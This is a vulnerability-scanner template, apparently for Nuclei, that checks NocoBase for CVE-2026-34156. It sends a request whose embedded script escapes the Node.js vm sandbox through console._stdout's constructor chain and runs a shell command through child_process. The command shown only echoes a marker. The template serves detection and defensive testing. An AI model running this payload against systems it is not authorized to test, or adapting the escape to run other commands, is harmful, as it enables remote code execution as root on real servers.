id: CVE-2026-34156

info:
  name: NocoBase - Workflow Script Node Sandbox Escape to RCE
  author: 0xBlackash
  severity: critical
  description: |
    NocoBase versions prior to 2.0.28 allow authenticated attackers to escape the Node.js vm sandbox in the Workflow JavaScript Script Node via console._stdout prototype chain traversal, leading to remote code execution as root.
  reference:
    - https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c
    - https://nvd.nist.gov/vuln/detail/CVE-2026-34156
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2026-34156
  tags: cve,cve2026,nocobase,rce,sandbox-escape,workflow

requests:
  - raw:
      - |
        POST /api/flow_nodes:test HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {
          "workflow": {
            "nodes": [
              {
                "type": "script",
                "config": {
                  "script": "const escape = console._stdout.constructor.constructor('return process')(); const child = escape.mainModule.require('child_process'); child.execSync('echo CVE-2026-34156-VULNERABLE-' + Date.now());"
                }
              }
            ]
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "CVE-2026-34156-VULNERABLE-"
        part: body

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: leaked_output
        group: 1
        regex:
          - "(CVE-2026-34156-VULNERABLE-[0-9]+)"
        part: body